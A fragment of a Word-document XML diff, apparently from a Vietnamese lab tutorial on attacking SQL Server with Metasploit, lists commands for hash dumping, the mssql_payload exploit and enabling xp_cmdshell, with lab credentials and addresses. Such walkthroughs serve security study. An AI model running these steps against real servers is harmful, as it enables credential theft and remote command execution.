+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>mssql_hashdump</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>set rhosts 192.168.1.149</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>set username sa</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>set password Password@1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>expoit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="5"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -2460,8 +2646,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2471,7 +2656,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>khớp với từ khóa trong tùy chọn keywords</w:t>
+        <w:t>xp_cmdshell</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2497,17 +2682,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>use auxiliary/admin/mssql/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>mssql_findandsampledata</w:t>
+        <w:t>use exploit/windows/mssql/mssql_payload</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2611,388 +2786,6 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>set sample_size 4: chọn 4 bản ghi từ mỗi bảng bị ảnh hưởng hay thỏa mãn keywords.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>set keywords FirstName|passw|credit: tìm tất cả các cột khớp với từ khóa sau keywords.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>Exploit.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>Trích xuất tên người dùng và băm mật khẩu</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>use auxiliary/scanner/mssql/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>mssql_hashdump</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>set rhosts 192.168.1.149</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>set username sa</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>set password Password@1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>expoit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="5"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>xp_cmdshell</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>use exploit/windows/mssql/mssql_payload</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>set rhosts 192.168.1.3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>set username lowpriv</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>set password Password@1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
         <w:t>exploit</w:t>
       </w:r>
     </w:p>
@@ -3081,7 +2874,6 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Bạn đã đặt username và password thành lowpriv và Password@1 tương ứng, có nghĩa là đây là thông tin đăng nhập bạn sẽ sử dụng để truy cập vào máy chủ SQL Server.</w:t>
       </w:r>
     </w:p>
@@ -3140,6 +2932,291 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1104"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Cách bật </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>xp_cmdshell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1104"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>-- this turns on advanced options and is needed to configure xp_cmdshell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1104"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>EXEC sp_configure 'show advanced options', '1'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1104"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>RECONFIGURE</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1104"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>-- this enables xp_cmdshell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1104"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>EXEC sp_configure 'xp_cmdshell', '1'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1104"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>RECONFIGURE</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1104"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Cấp quyền tin cậy cho database </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1104"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>USE [YourDatabaseName]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1104"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>GO</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1104"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>ALTER DATABASE [YourDatabaseName] SET TRUSTWORTHY ON</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1104"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>GO</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
@@ -3409,6 +3486,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Bạn đã đặt cmd thành "net user", có nghĩa là đây là lệnh Windows bạn muốn thực thi trên máy chủ SQL Server. Lệnh net user sẽ liệt kê tất cả các tài khoản người dùng trên máy chủ Windows.</w:t>
       </w:r>
     </w:p>
@@ -3440,6 +3518,9 @@
     </w:p>
     <w:p>
       <w:pPr>
